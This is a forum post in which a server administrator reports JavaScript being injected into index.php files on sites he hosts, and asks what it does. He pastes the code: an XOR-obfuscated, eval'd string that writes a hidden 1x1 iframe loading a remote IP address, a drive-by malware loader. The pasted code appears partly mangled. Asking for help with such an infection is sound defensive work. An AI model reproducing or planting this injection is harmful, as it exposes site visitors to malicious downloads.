Apperently alot of the index.php files on multiple sites i host on a SUSE box hosted on oneandone dedicated server are being injected with javascript code i posted below…
It opens up a frontpage office install on winxp when you go to the sites…
Anyone know what the code below is doing and what the threat level is?
I cleaned it up on some sites but left it on one for now as i dont know what it does
Anyone know?
infected site:mybalroom.com
Greatly apreciate your time
Pete
----code being injected
<script language=‘javascript’>function cirpfjyua(lsolytfeqrzhg, nzndhq){var jyaghrpagphcgiuwrxh = “”;for (var i = 0 ; i < lsolytfeqrzhg.length; ++i) xyloqymhhfkqdhgu += String.fromCharCode(nzncirpfjyuacirpfjyuacirpfjyua dhq ^(nzndhq ^ lsolytfeqrzhg.charCodeAt(i)));return xyloqymhhfkqdhgu;}var lsolytfeqrzhg = “\x20\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\ x77\x72\x69\x74\x65\x28\x27\x3c\x64\x69\x76\x20\x7 3\x74\x79\x6c\x65\x3d\x22\x76\x69\x73\x69\x62\x69\ x6c\x69\x74\x79\x3a\x68\x69\x64\x64\x65\x6e\x22\x3 e\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\ x22\x68\x74\x74\x70\x3a\x2f\x2f\x38\x35\x2e\x31\x3 7\x2e\x31\x34\x33\x2e\x31\x35\x32\x2f\x22\x20\x77\ x69\x64\x74\x68\x3d\x31\x20\x68\x65\x69\x67\x68\x7 4\x3d\x31\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\ x3c\x2f\x64\x69\x76\x3e\x27\x29\x3b\x0d\x0a\x0d\x0 a”; var xyloqymhhfkqdhgu = cirpfjyua(lsolytfeqrzhg, 121); eval(xyloqymhhfkqdhgu); </script>
--------END---------